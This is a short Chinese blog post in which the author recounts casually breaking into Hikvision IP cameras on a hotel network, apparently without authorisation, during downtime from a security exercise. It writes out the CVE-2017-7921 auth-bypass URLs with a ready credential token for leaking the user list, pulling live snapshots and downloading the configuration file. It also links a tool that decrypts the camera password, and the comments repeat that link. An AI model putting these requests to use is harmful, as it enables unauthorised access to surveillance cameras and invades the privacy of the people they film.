一次hotel "fuck" 摄像头

1C 2020-08-07 PM 691℃ 4条

最近出去H V V,在酒店闲(tou)暇(lan)期间随手搞了搞摄像头。

首先
基操,,直接开扫,,发现好几个

然后
访问https://192.168.x.x/
一顿瞎🐔吧爆破弱口令 无果

再然后
这时候祭出神器 百度一下 ,百度告诉我有个CVE-2017-7921😮 那就试试

访问泄露信息:https://192.168.x.x/Security/users?auth=YWRtaW46MTEK

访问泄露快照:https://192.168.x.x/onvif-http/snapshot?auth=YWRtaW46MTEK
每刷新一下截取一次快照

访问会down一个配置文件:https://192.168.x.x/System/configurationFile?auth=YWRtaW46MTEK

文件通过工具解密后会拿到密码😏
工具链接:https://github.com/WormChickenWizard/hikvision-decrypter
通过巴拉巴拉解密后 耶嗨,密码就出来了

再再然后
嘿嘿嘿🚫溜了溜了

标签: Hikvision, CVE-2017-7921

非特殊说明,本博所有文章均为博主原创。

上一篇 批量获取网站状态码及标题的脚本
下一篇 没有了

评论啦~



已有 4 条评论


  1. Reluctantly
    Reluctantly

    你好,请问一下,你那个反向解密的软件是那个软件?

    回复 2020-11-21 12:30
    1. 1C
      1C 博主

      https://github.com/WormChickenWizard/hikvision-decrypter

      回复 2020-11-21 16:51
      1. Reluctantly
        Reluctantly

        多谢

        回复 2020-11-21 16:53
  2. 席晓欢
    席晓欢

    感觉贵站非常不错,希望与贵站友情链接!

    我的网站:建站知道网-http://wozhidaole.com.cn

    如果同意互换友情链接,请回复!

    回复 2020-12-05 09:56